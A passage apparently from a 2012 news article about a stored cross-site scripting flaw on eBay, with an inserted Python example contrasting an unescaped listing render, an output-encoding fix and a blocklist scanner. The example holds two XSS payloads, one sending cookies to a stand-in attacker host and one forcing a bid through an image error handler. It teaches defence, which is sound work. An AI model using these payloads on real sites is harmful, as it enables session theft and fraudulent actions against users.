“Implications could range from abusing eBay’s trust and tricking [the users] into some download… to potentially playing with the auctions: placing bids on items the user doesn’t want / buyouts, accessing his/her account, selling fake stuff and similar.”

Cross-site scripting (XSS) is a web application vulnerability in which attacker-supplied script ends up, unescaped, in a page the site serves, so that it runs in victims’ browsers under the site’s own origin and with their logged-in session: the code appears to come from the site they are visiting even though an attacker wrote it. It is one of the most common categories of web security vulnerability, but the impact of XSS flaws varies greatly.
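As an added example of the stored-XSS shape described above (not eBay's code, and not Upadhyay's proof of concept, which the page does not show), the listing template, the payloads and the scanner below are all constructed for illustration. It puts the vulnerable render beside the hardened one and also shows why a blocklist scanner of the kind eBay describes gives false negatives: the fix is output encoding, not pattern matching.

```python
"""Stored XSS in a seller-controlled listing, the output-encoding fix, and a
blocklist scanner's blind spot. Added example; template, payloads and scanner
are constructed here and are not eBay's.
"""
import html
import re

# Constructed listing template: seller-controlled fields land in HTML text content.
LISTING_TEMPLATE = '<h1 class="title">{title}</h1>\n<div class="description">{description}</div>'

# Constructed payloads of the kind a seller account could store in a listing.
# attacker.invalid is a reserved, non-resolving name.
PAYLOAD_SCRIPT = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
PAYLOAD_IMG = '<img src=x onerror="fetch(\'/bid?item=1&amount=9999\',{credentials:\'include\'})">'


def render_listing_unsafe(title: str, description: str) -> str:
    """Vulnerable: stored user content is concatenated straight into the page."""
    return LISTING_TEMPLATE.format(title=title, description=description)


def render_listing_safe(title: str, description: str) -> str:
    """Hardened: encode for the HTML text context at output time, whatever was stored.
    quote=True also encodes ' and " so the same helper is safe inside quoted attributes."""
    return LISTING_TEMPLATE.format(
        title=html.escape(title, quote=True),
        description=html.escape(description, quote=True),
    )


NAIVE_SCANNER = re.compile(r"<\s*script", re.IGNORECASE)


def naive_scan_flags(text: str) -> bool:
    """Blocklist scanner: catches <script>, misses an event handler on any other tag."""
    return NAIVE_SCANNER.search(text) is not None


def renders_active_markup(page: str) -> bool:
    """Oracle used below: did a live tag from the payload survive into the output?
    An on* handler only executes inside a real tag, so an unescaped '<' is the tell."""
    return re.search(r"<\s*(script|img)\b", page, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, payload in (("script", PAYLOAD_SCRIPT), ("img/onerror", PAYLOAD_IMG)):
        print(f"{name}: scanner flags={naive_scan_flags(payload)} "
              f"unsafe render executes={renders_active_markup(render_listing_unsafe('Rug', payload))} "
              f"safe render executes={renders_active_markup(render_listing_safe('Rug', payload))}")
```

Where a marketplace must allow some seller markup, the right tool is an allowlist sanitizer run at render time that keeps a fixed set of tags and attributes and drops everything else, never a blocklist of known-bad strings; the `img`/`onerror` payload above passes the blocklist and is exactly the kind of thing Karg describes, a forced bid placed with the victim's own session.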

“In my experience XSS vulnerabilities always have gotten more attention than they deserve,” Karg explained. “First of all, you’re attacking other visitors, not the site itself.”

He added that there are two types of XSS vulnerability: persistent and reflected. The eBay vulnerability fell into the first, more serious, category, according to Karg, so it’s just as well it has been resolved sooner rather than later. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/22/ebay_plugs_xss_vuln/